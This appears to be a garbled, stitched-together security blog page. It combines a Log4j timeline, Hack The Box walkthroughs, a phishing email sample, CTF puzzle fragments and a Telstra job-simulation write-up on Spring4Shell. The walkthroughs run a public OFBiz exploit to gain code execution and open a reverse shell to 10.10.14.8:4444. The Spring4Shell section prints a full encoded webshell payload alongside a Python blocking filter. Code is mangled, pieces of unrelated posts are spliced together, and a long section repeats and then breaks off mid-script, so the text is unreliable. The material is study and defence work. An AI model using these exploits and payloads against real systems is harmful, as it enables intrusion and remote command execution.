Incident Timeline
+ timeline
+ title Log4j Vulnerability Incident Timeline
+ November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache
+ December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0)
+ December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware
+ December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert
+ December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack
+ December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability
+
+
+
缓解措施
Log4j漏洞,也称为**Log4Shell (CVE-2021-44228)**,是一个严重的远程代码执行(RCE)漏洞,影响了 Apache Log4j 2 版本。这一漏洞允许攻击者通过向日志记录输入恶意的JNDI(Java Naming and Directory Interface)查找字符串,触发服务器下载和执行恶意代码。
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# nmap -p- $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AEST Nmap scan report for bizness.htb (10.129.232.1) Host is up (0.040s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 41845/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds
+
+
1
echo"10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# update-alternatives --config java There are 3 choices for the alternative java (providing /usr/bin/java).
Press <enter> to keep the current choice[*], or type selection number: 1 update-alternatives: using /usr/lib/jvm/java-11-openjdk-arm64/bin/java to provide /usr/bin/java (java) in manual mode ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# java --version openjdk 11.0.20-ea 2023-07-18 OpenJDK Runtime Environment (build 11.0.20-ea+7-post-Debian-1) OpenJDK 64-Bit Server VM (build 11.0.20-ea+7-post-Debian-1, mixed mode)
+
+
+
+
开启tcpdump
+
1
sudo tcpdump -i 2 icmp
+
+
运行POC
+
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb rce "ping -c 5 10.10.14.8" Not Sure Worked or not
+
+
查看抓到的数据包:
+
1 2 3 4 5 6 7 8
┌──(root@kali)-[/home/h4m5t/Desktop] └─# tcpdump -i 2 icmp tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes 21:47:38.693694 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 1, length 64 21:47:38.693728 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 1, length 64 21:47:39.695235 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 2, length 64 21:47:39.695274 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 2, length 64
+
+
说明RCE成功,现在进行反向shell
+
首先开启nc监听,再运行exp
+
1
nc -nlvp 4444
+
+
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb shell 10.10.14.8:4444 Not Sure Worked or not
ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash <ecurity/config$ cat security.properties | grep hash # -- specify the type of hash to use for one-way encryption, will be passed to java.security.MessageDigest.getInstance() -- password.encrypt.hash.type=SHA
cat HashCrypt.java /******************************************************************************* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. *******************************************************************************/ package org.apache.ofbiz.base.crypto;
privatestaticbooleandoCompareTypePrefix(String crypted, String defaultCrypt, byte[] bytes) { inttypeEnd= crypted.indexOf("}"); StringhashType= crypted.substring(1, typeEnd); Stringhashed= crypted.substring(typeEnd + 1); MessageDigestmessagedigest= getMessageDigest(hashType); messagedigest.update(bytes); byte[] digestBytes = messagedigest.digest(); char[] digestChars = Hex.encodeHex(digestBytes); StringcheckCrypted=newString(digestChars); if (hashed.equals(checkCrypted)) { returntrue; } // This next block should be removed when all {prefix}oldFunnyHex are fixed. if (hashed.equals(oldFunnyHex(digestBytes))) { Debug.logWarning("Warning: detected oldFunnyHex password prefixed with a hashType; this is not valid, please update the value in the database with ({%s}%s)", module, hashType, checkCrypted); returntrue; } returnfalse; }
/* * @deprecated use cryptBytes(hashType, salt, password); eventually, use * cryptUTF8(hashType, salt, password) after all existing installs are * salt-based. If the call-site of cryptPassword is just used to create a *new* * value, then you can switch to cryptUTF8 directly. */ @Deprecated publicstatic String cryptPassword(String hashType, String salt, String password) { if (hashType.startsWith("PBKDF2")) { return password != null ? pbkdf2HashCrypt(hashType, salt, password) : null; } return password != null ? cryptBytes(hashType, salt, password.getBytes(UtilIO.getUtf8())) : null; }
messagedigest.update(strBytes); return oldFunnyHex(messagedigest.digest()); } catch (Exception e) { Debug.logError(e, "Error while computing hash of type " + hashType, module); } return str; }
// This next block should be removed when all {prefix}oldFunnyHex are fixed. privatestatic String oldFunnyHex(byte[] bytes) { intk=0; char[] digestChars = newchar[bytes.length * 2]; for (byte b : bytes) { inti1= b;
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Minimim salt length supported by kernel: 0 Maximum salt length supported by kernel: 256
ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits.
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There’s an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There’s also an arbirtray file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental] └─# nmap -sC -sV $(cat ip.txt) Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 19:58 AEST Nmap scan report for 10.129.96.12 Host is up (0.010s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: Mixt Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental] └─# dirsearch -u "http://10.129.96.12" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict
www-data@rental:/var/www/html/admin$ mysql -u manager -p'password#1' car_rental_db Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 217 Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
MariaDB [car_rental_db]> SHOW GRANTS FOR 'manager'@'localhost'; +---------------------------------------------------------------------------------------------------------------+ | Grants for manager@localhost | +---------------------------------------------------------------------------------------------------------------+ | GRANT FILE ON *.* TO `manager`@`localhost` IDENTIFIED BY PASSWORD '*A778F55EAE542DA23ED0F6351B01262EFFD3BBB0' | | GRANT ALL PRIVILEGES ON `car_rental_db`.* TO `manager`@`localhost` | +---------------------------------------------------------------------------------------------------------------+ 2 rows inset (0.000 sec)
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Invalidated] └─# nmap -sC -sV $(cat ip.txt) Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 23:26 AEST Nmap scan report for invalidated.htb (10.129.233.58) Host is up (0.015s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) |_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Sign up |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.09 seconds
Hello dear user, I am Larry Page and I am delighted to announce to you that= you are the 99999999th GMAIL account and for that we want to reward you. = You've earned $1,000,000. To claim your prize open the attached file. ----_NmP-426c22a2e0d8fc9a-Part_2 Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: quoted-printable
<p>Hello dear user, I am Larry Page and I am delighted to announce to you = that you are the 99999999th GMAIL account and for that we want to reward = you. You've earned $1,000,000. To claim your prize open the attached file.= <br></p> ----_NmP-426c22a2e0d8fc9a-Part_2--
# 循环提取 ZIP 文件 while [ -f "$filename" ]; do # 提取当前 ZIP 文件中的所有内容 unzip -o "$filename" # 找到下一个 ZIP 文件 next_zip=$(find . -name "*.zip" | head -n 1) # 如果找到新的 ZIP 文件,更新 filename,否则跳出循环 if [ -n "$next_zip" ]; then filename="$next_zip" else echo "Extraction complete or no more ZIP files found." break fi done
~/Desktop/testtest/ hexdump -C message.txt 00000000 ff fe 68 00 fe ff 00 65 ff fe 32 00 fe ff 00 30 |..h....e..2....0| 00000010 ff fe 32 00 fe ff 00 33 ff fe 7b 00 fe ff 00 75 |..2....3..{....u| 00000020 ff fe 37 00 fe ff 01 92 ff fe 5f 00 fe ff 00 62 |..7......._....b| 00000030 ff fe 30 00 fe ff 00 6d ff fe 35 00 fe ff 00 73 |..0....m..5....s| 00000040 ff fe 5f 00 fe ff 00 38 ff fe 72 00 fe ff 15 f1 |.._....8..r.....| 00000050 ff fe 5f 00 fe ff 00 6e ff fe 30 00 fe ff 00 37 |.._....n..0....7| 00000060 ff fe 5f 00 fe ff 00 38 ff fe 63 31 fe ff 00 77 |.._....8..c1...w| 00000070 ff fe 61 00 fe ff 00 79 ff fe 35 00 fe ff 00 5f |..a....y..5...._| 00000080 ff fe 31 00 fe ff 00 67 ff fe 6e 00 fe ff 00 30 |..1....g..n....0| 00000090 ff fe 72 00 fe ff 15 f1 ff fe 64 00 fe ff 00 7d |..r.......d....}| 000000a0
+
+
提取出flag:
+
1
he2023{u7_b0m5s_8r_n07_8c1way5_1gn0rd}
+
+
+
+
Rotational
题目:
+
1
96a_abL_?b04c?0Cbc50C_E_C03c4<HcC5DN
+
+
任务是解密这段文本,(flag)。初步尝试使用常见的 ROT13 等简单的旋转密码未能成功,提示“the rotor must have been too fast!”暗示可能使用了更复杂的旋转算法。
Telstra is Australia’s largest telecommunications company, offering services like mobile phones, internet, and data solutions to millions of customers nationwide. Known for its reliability and innovation, Telstra connects people and businesses, ensuring smooth and effective communication.
+
The Telstra Cybersecurity Job Simulation Project is a training program designed to replicate real-world cybersecurity challenges. Participants work through tasks such as detecting threats, responding to incidents, collaborating with different teams, and implementing technical solutions to protect digital systems. This simulation helps individuals build the skills needed to defend against cyber attacks and keep Telstra’s services secure.
+
In the dynamic realm of cybersecurity, organizations must remain vigilant and responsive to emerging threats to safeguard their infrastructure and services. This blog post presents a detailed case study of how Telstra’s Security Operations Centre (SOC) effectively responded to a Spring4Shell (CVE-2022-22965) malware attack targeting the NBN Connection service. We will walk through the entire incident response process, encompassing initial threat triage, inter-team communication, technical mitigation using Python-based firewall rules, troubleshooting, and a post-incident analysis.
+
+
Task 1: Initial Threat Triage and Notification
Incident Identification and Severity Assessment
On March 20th, 2024, at 14:20 UTC, the SOC detected unusual activity targeting the NBN Connection service (nbn.external.network), which operates on Spring Framework 5.3.0. The attack manifested through multiple malicious POST requests to the /tomcatwar.jsp endpoint, indicating an exploitation attempt of the Spring4Shell vulnerability.
+
Affected Infrastructure and Prioritization
An analysis of firewall logs revealed that the NBN Connection service was under direct attack. Given its critical role in providing high-speed internet connectivity, the incident was classified as P1 - Critical. Other services, including Mobile Tower Connection, Home & Business Lines, and ADSL Connect, were evaluated and found to be unaffected based on the current logs. Nonetheless, continuous monitoring was recommended to ensure comprehensive security.
+
Notification of the Respective Team
Prompt communication was essential to coordinate an effective response. An urgent email was drafted and sent to the NBN Team, alerting them of the ongoing attack and the necessity to initiate immediate incident response measures.
+
Email to NBN Team:
+
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
From: Telstra Security Operations To: NBN Team (nbn@email) Subject: Urgent: Malware Attack Impacting NBN Connection Service
--- Body:
Hello NBN Team,
At **14:20 on March 20, 2024**, a malware attack targeting the **NBN Connection service** running on the **Spring Framework** was detected, resulting in service disruption and impaired functionality. This incident has been assessed as **P1 - Critical** and requires the immediate initiation of incident response measures to restore services and prevent further impact.
Please review the relevant logs promptly and take the necessary mitigation actions. If you need assistance or have any questions, feel free to contact us.
Kind regards, Telstra Security Operations
+
+
This communication ensured that the NBN Team was promptly informed, enabling them to take swift action to mitigate the threat.
+
+
Task 2: Collaborating with the Networks Team to Mitigate the Attack
Analyzing Firewall Logs and Identifying Attack Patterns
Upon identifying the attack, the SOC conducted a thorough analysis of the firewall logs. The logs indicated that the attack originated from multiple IP addresses within the AU region, utilizing specific malicious payloads designed to exploit the Spring4Shell vulnerability. The attack pattern involved POST requests to the /tomcatwar.jsp endpoint with parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others.
+
Drafting an Email to the Networks Team
To address the distributed nature of the attack without blocking individual IP addresses, the SOC collaborated with the Networks Team to implement a firewall rule that filters incoming traffic based on the identified malicious request characteristics.
From: Telstra Security Operations To: Networks Team (networks@email) Subject: Create Firewall Rule to Mitigate Spring4Shell Attack
--- Body:
Hello Networks Team,
We would like to request the creation of a firewall rule and provide you with more information about the ongoing attack.
**Type of Attack:** Our analysis of the firewall logs indicates a Spring4Shell (CVE-2022-22965) malware attack targeting the **NBN Connection service (nbn.external.network)**. The attack involves multiple POST requests to `/tomcatwar.jsp` with malicious payloads designed to exploit the Spring Framework vulnerability.
**Characteristics to Block:** - **Request Path:** `/tomcatwar.jsp` - **HTTP Method:** `POST` - **Specific Payload Patterns:** Requests containing parameters such as `class.module.classLoader.resources.context.parent.pipeline.first.pattern` and related malicious payloads.
**Request:** Please implement a firewall rule to block incoming POST requests to the `/tomcatwar.jsp` endpoint and inspect for the presence of the aforementioned malicious payload patterns in the request data. This should help mitigate the distributed nature of the attack by targeting the specific exploit characteristics rather than individual IP addresses.
**Additional Information:** The attack has been distributed across multiple IP addresses within the AU region. Blocking the specific request patterns will provide a more effective mitigation strategy. Attached is a proof of concept payload that demonstrates how the attacker scripts this attack, which may aid in refining the firewall rules.
For any questions or issues, don’t hesitate to reach out to us.
Kind regards, Telstra Security Operations
+
+
This email provided the Networks Team with the necessary details to develop targeted firewall rules, enhancing the organization’s defensive measures against the attack.
+
+
Task 3: Implementing Firewall Rules with Python
Developing a Python-Based Firewall Rule
To mitigate the attack effectively, a Python script was developed to implement a firewall rule that filters incoming traffic based on the identified malicious request characteristics. The goal was to block malicious POST requests to the /tomcatwar.jsp endpoint without relying on IP-based blocking, which is less effective against distributed attacks.
defdo_POST(self): # Check if the request path is the targeted endpoint if self.path == '/tomcatwar.jsp': # Retrieve and decode the request body content_length = int(self.headers.get('Content-Length', 0)) body = self.rfile.read(content_length).decode('utf-8') params = urllib.parse.parse_qs(body) # Check for the presence of any malicious parameters ifany(param in params for param in MALICIOUS_PARAMS): block_request(self) return else: allow_request(self) return else: # For all other POST requests, allow them allow_request(self)
deflog_message(self, format, *args): # Override to suppress default logging return
if __name__ == "__main__": server = HTTPServer((host, port), ServerHandler) print("[+] Firewall Server") print("[+] HTTP Web Server running on: %s:%s" % (host, port))
server.server_close() print("[+] Server terminated. Exiting...") exit(0)
+
+
Testing the Firewall Rule
A complementary script, test_requests.py, was utilized to simulate both malicious and benign requests to ensure the firewall rule functioned as intended.
# Test Requester.py # www.theforage.com - Telstra Cyber Task 3 # Test Requester
import http.client
host = "localhost" port = 8000
defmain(): target = f"{host}:{port}" print(f"[+] Beginning test requests to: {target}") successful_responses = 0
for x inrange(5): payload = ( "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(" "%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di." "getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20" "%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%" "7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module." "classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader." "resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent." "pipeline.first.fileDateFormat=" ) print(f"[{x + 1}/5]: Making test request to {target} with payload: {payload}") conn = http.client.HTTPConnection(target)
print("[+] Test completed.") print(f"[+] Successful responses: {successful_responses}/5")
if __name__ == "__main__": main()
+
+
Troubleshooting: Addressing Port Conflicts
During the deployment of the firewall_server.py script, an error was encountered:
+
1
OSError: [Errno 48] Address already in use
+
+
This indicated that port 8000 was occupied by another process, preventing the firewall server from binding to it. The following steps were undertaken to resolve the issue:
+
+
Identifying the Occupying Process:
+
Using the lsof command:
+
1
lsof -i :8000
+
+
This command revealed the Process ID (PID) of the application using port 8000.
+
+
Terminating the Conflicting Process:
+
The identified process was terminated using the kill command:
+
1
kill -9 <PID>
+
+
Replace <PID> with the actual Process ID obtained from the previous step.
+
+
Verifying Port Availability:
+
Ensuring that port 8000 was free by rerunning the lsof command:
+
1
lsof -i :8000
+
+
No output indicates that the port is now free.
+
+
Restarting the Firewall Server:
+
After freeing up the port, the firewall_server.py script was successfully executed:
+
1
python3 firewall_server.py
+
+
The server started without issues, indicating that it was listening on the designated port.
+
+
+
Alternative Solution: Changing the Server Port
If port 8000 remains consistently in use, an alternative approach involves changing the server to listen on a different port (e.g., 8080). This requires updating both the firewall_server.py and test_requests.py scripts to reflect the new port number.
+
+
Edit firewall_server.py:
+
Modify the port variable:
+
1 2
host = "localhost" port = 8080
+
+
Edit test_requests.py:
+
Update the port number accordingly:
+
1 2
host = "localhost" port = 8080
+
+
Run the Modified Server:
+
1
python3 firewall_server.py
+
+
Run the Test Requester:
+
1
python3 test_requests.py
+
+
This ensures that the firewall rule is correctly applied on the new port.
+
+
+
+
Task 4: Incident Postmortem and Lessons Learned
Incident Postmortem: Spring4Shell Malware Attack on NBN Connection Service
+
Summary
On March 20th, 2024, at 14:20 UTC, Telstra’s Security Operations Centre (SOC) detected a P1 - Critical malware attack targeting the NBN Connection service (nbn.external.network), operating on Spring Framework 5.3.0. The attack involved multiple malicious POST requests to the /tomcatwar.jsp endpoint, exploiting the Spring4Shell (CVE-2022-22965) vulnerability. The incident was identified through firewall log analysis and was successfully mitigated two hours after detection by implementing a targeted firewall rule. Key teams involved in the response included the Security Operations Centre and the NBN Team.
+
+
Impact
+
Service Disruption: The NBN Connection service experienced significant downtime, impairing high-speed internet connectivity for customers relying on this infrastructure.
+
Operational Impairment: Critical services dependent on the NBN Connection, such as remote communications and business operations, were temporarily affected.
+
Potential Data Exposure: Although no data breaches were confirmed, the nature of the attack posed a risk of unauthorized command execution and potential data exfiltration.
+
+
+
Detection
The incident was discovered through routine monitoring of firewall logs by the SOC. Analysis revealed a pattern of multiple POST requests to the /tomcatwar.jsp endpoint originating from several IP addresses within the AU region. These requests contained specific malicious payloads characteristic of the Spring4Shell vulnerability, including parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others designed to execute remote commands.
+
+
Root Cause
The root cause of the incident was the exploitation of the Spring4Shell (CVE-2022-22965) vulnerability within the Spring Framework 5.3.0 used by the NBN Connection service. Attackers crafted malicious POST requests to the /tomcatwar.jsp endpoint, embedding payloads that leveraged this vulnerability to execute arbitrary commands on the server, leading to service disruption and impaired functionality.
+
+
Resolution
To mitigate the attack, the SOC collaborated with the Networks Team to implement a targeted firewall rule using a Python-based HTTP server (firewall_server.py). The rule specifically blocked incoming POST requests to the /tomcatwar.jsp endpoint that contained the identified malicious parameters. This measure effectively halted the ongoing attack within two hours of its initiation, restoring the NBN Connection service to operational status and preventing further unauthorized access.
+
+
Action Items
+
Immediate Actions:
+
+
Firewall Rule Implementation: Successfully deployed a Python-scripted firewall rule to block malicious POST requests targeting the /tomcatwar.jsp endpoint.
+
Service Restoration: Coordinated with the Networks Team to ensure the NBN Connection service was promptly restored to normal operations.
+
+
+
Short-Term Actions:
+
+
Vulnerability Patching: Upgrade the Spring Framework to the latest version to eliminate the exploited Spring4Shell vulnerability.
+
Enhanced Monitoring: Increase the frequency and depth of firewall log reviews to detect similar or new attack patterns more swiftly.
+
Incident Documentation: Complete detailed documentation of the incident for future reference and compliance purposes.
+
+
+
Long-Term Actions:
+
+
Security Training: Conduct training sessions for the SOC and relevant teams on identifying and responding to similar vulnerabilities and attack vectors.
+
Comprehensive Security Audit: Perform a thorough security audit of all critical services to identify and remediate potential vulnerabilities.
+
Automation of Response Mechanisms: Develop automated scripts and tools to detect and mitigate such attacks in real-time, reducing response times.
+
Collaboration with Development Teams: Work closely with development teams to ensure secure coding practices are followed, particularly when using frameworks like Spring.
+
+
+
Future Prevention:
+
+
Regular Updates and Patching: Establish a routine schedule for updating and patching all software frameworks and dependencies to minimize vulnerability exposure.
+
Advanced Threat Detection Systems: Invest in more sophisticated threat detection and prevention systems that can identify and block complex attack patterns.
+
Incident Response Drills: Conduct regular incident response drills to ensure all teams are prepared to handle similar attacks efficiently.
+
+
+
+
+
Lessons Learned
+
Proactive Monitoring: Continuous and proactive monitoring of firewall logs is essential in the early detection of potential threats.
+
Collaborative Response: Effective communication and collaboration between the SOC and infrastructure teams are critical in swiftly mitigating attacks.
+
Automation and Scripting: Utilizing scripting languages like Python for developing automated firewall rules can significantly enhance response times and accuracy.
+
Regular Patching: Keeping all software frameworks and dependencies up-to-date is vital in preventing exploitation of known vulnerabilities.
+
Comprehensive Documentation: Maintaining detailed incident postmortems aids in future governance, risk management, and compliance efforts while educating the team on handling similar incidents.
+
+
+
Conclusion
This incident underscored the importance of robust monitoring, swift response mechanisms, and collaborative efforts in combating sophisticated malware attacks. By implementing targeted firewall rules and adhering to best practices in incident response, Telstra effectively mitigated the Spring4Shell attack, ensuring the continuity of its critical services and reinforcing its commitment to cybersecurity excellence.
+
+
Prepared by: Telstra Security Operations Date: April 27, 2024
Telstra is Australia’s largest telecommunications company, offering services like mobile phones, internet, and data solutions to millions of customers nationwide. Known for its reliability and innovation, Telstra connects people and businesses, ensuring smooth and effective communication.
The Telstra Cybersecurity Job Simulation Project is a training program designed to replicate real-world cybersecurity challenges. Participants work through tasks such as detecting threats, responding to incidents, collaborating with different teams, and implementing technical solutions to protect digital systems. This simulation helps individuals build the skills needed to defend against cyber attacks and keep Telstra’s services secure.
In the dynamic realm of cybersecurity, organizations must remain vigilant and responsive to emerging threats to safeguard their infrastructure and services. This blog post presents a detailed case study of how Telstra’s Security Operations Centre (SOC) effectively responded to a Spring4Shell (CVE-2022-22965) malware attack targeting the NBN Connection service. We will walk through the entire incident response process, encompassing initial threat triage, inter-team communication, technical mitigation using Python-based firewall rules, troubleshooting, and a post-incident analysis.
Task 1: Initial Threat Triage and Notification
Incident Identification and Severity Assessment
On March 20th, 2024, at 14:20 UTC, the SOC detected unusual activity targeting the NBN Connection service (nbn.external.network), which operates on Spring Framework 5.3.0. The attack manifested through multiple malicious POST requests to the /tomcatwar.jsp endpoint, indicating an exploitation attempt of the Spring4Shell vulnerability.
Affected Infrastructure and Prioritization
An analysis of firewall logs revealed that the NBN Connection service was under direct attack. Given its critical role in providing high-speed internet connectivity, the incident was classified as P1 - Critical. Other services, including Mobile Tower Connection, Home & Business Lines, and ADSL Connect, were evaluated and found to be unaffected based on the current logs. Nonetheless, continuous monitoring was recommended to ensure comprehensive security.
Notification of the Respective Team
Prompt communication was essential to coordinate an effective response. An urgent email was drafted and sent to the NBN Team, alerting them of the ongoing attack and the necessity to initiate immediate incident response measures.
Email to NBN Team:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
From: Telstra Security Operations To: NBN Team (nbn@email) Subject: Urgent: Malware Attack Impacting NBN Connection Service
--- Body:
Hello NBN Team,
At **14:20 on March 20, 2024**, a malware attack targeting the **NBN Connection service** running on the **Spring Framework** was detected, resulting in service disruption and impaired functionality. This incident has been assessed as **P1 - Critical** and requires the immediate initiation of incident response measures to restore services and prevent further impact.
Please review the relevant logs promptly and take the necessary mitigation actions. If you need assistance or have any questions, feel free to contact us.
Kind regards, Telstra Security Operations
This communication ensured that the NBN Team was promptly informed, enabling them to take swift action to mitigate the threat.
Task 2: Collaborating with the Networks Team to Mitigate the Attack
Analyzing Firewall Logs and Identifying Attack Patterns
Upon identifying the attack, the SOC conducted a thorough analysis of the firewall logs. The logs indicated that the attack originated from multiple IP addresses within the AU region, utilizing specific malicious payloads designed to exploit the Spring4Shell vulnerability. The attack pattern involved POST requests to the /tomcatwar.jsp endpoint with parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others.
Drafting an Email to the Networks Team
To address the distributed nature of the attack without blocking individual IP addresses, the SOC collaborated with the Networks Team to implement a firewall rule that filters incoming traffic based on the identified malicious request characteristics.
From: Telstra Security Operations To: Networks Team (networks@email) Subject: Create Firewall Rule to Mitigate Spring4Shell Attack
--- Body:
Hello Networks Team,
We would like to request the creation of a firewall rule and provide you with more information about the ongoing attack.
**Type of Attack:** Our analysis of the firewall logs indicates a Spring4Shell (CVE-2022-22965) malware attack targeting the **NBN Connection service (nbn.external.network)**. The attack involves multiple POST requests to `/tomcatwar.jsp` with malicious payloads designed to exploit the Spring Framework vulnerability.
**Characteristics to Block:** - **Request Path:** `/tomcatwar.jsp` - **HTTP Method:** `POST` - **Specific Payload Patterns:** Requests containing parameters such as `class.module.classLoader.resources.context.parent.pipeline.first.pattern` and related malicious payloads.
**Request:** Please implement a firewall rule to block incoming POST requests to the `/tomcatwar.jsp` endpoint and inspect for the presence of the aforementioned malicious payload patterns in the request data. This should help mitigate the distributed nature of the attack by targeting the specific exploit characteristics rather than individual IP addresses.
**Additional Information:** The attack has been distributed across multiple IP addresses within the AU region. Blocking the specific request patterns will provide a more effective mitigation strategy. Attached is a proof of concept payload that demonstrates how the attacker scripts this attack, which may aid in refining the firewall rules.
For any questions or issues, don’t hesitate to reach out to us.
Kind regards, Telstra Security Operations
This email provided the Networks Team with the necessary details to develop targeted firewall rules, enhancing the organization’s defensive measures against the attack.
Task 3: Implementing Firewall Rules with Python
Developing a Python-Based Firewall Rule
To mitigate the attack effectively, a Python script was developed to implement a firewall rule that filters incoming traffic based on the identified malicious request characteristics. The goal was to block malicious POST requests to the /tomcatwar.jsp endpoint without relying on IP-based blocking, which is less effective against distributed attacks.
defdo_POST(self): # Check if the request path is the targeted endpoint if self.path == '/tomcatwar.jsp': # Retrieve and decode the request body content_length = int(self.headers.get('Content-Length', 0)) body = self.rfile.read(content_length).decode('utf-8') params = urllib.parse.parse_qs(body) # Check for the presence of any malicious parameters ifany(param in params for param in MALICIOUS_PARAMS): block_request(self) return else: allow_request(self) return else: # For all other POST requests, allow them allow_request(self)
deflog_message(self, format, *args): # Override to suppress default logging return
if __name__ == "__main__": server = HTTPServer((host, port), ServerHandler) print("[+] Firewall Server") print("[+] HTTP Web Server running on: %s:%s" % (host, port))
server.server_close() print("[+] Server terminated. Exiting...") exit(0)
Testing the Firewall Rule
A complementary script, test_requests.py, was utilized to simulate both malicious and benign requests to ensure the firewall rule functioned as intended.
# Test Requester.py # www.theforage.com - Telstra Cyber Task 3 # Test Requester
import http.client
host = "localhost" port = 8000
defmain(): target = f"{host}:{port}" print(f"[+] Beginning test requests to: {target}") successful_responses = 0
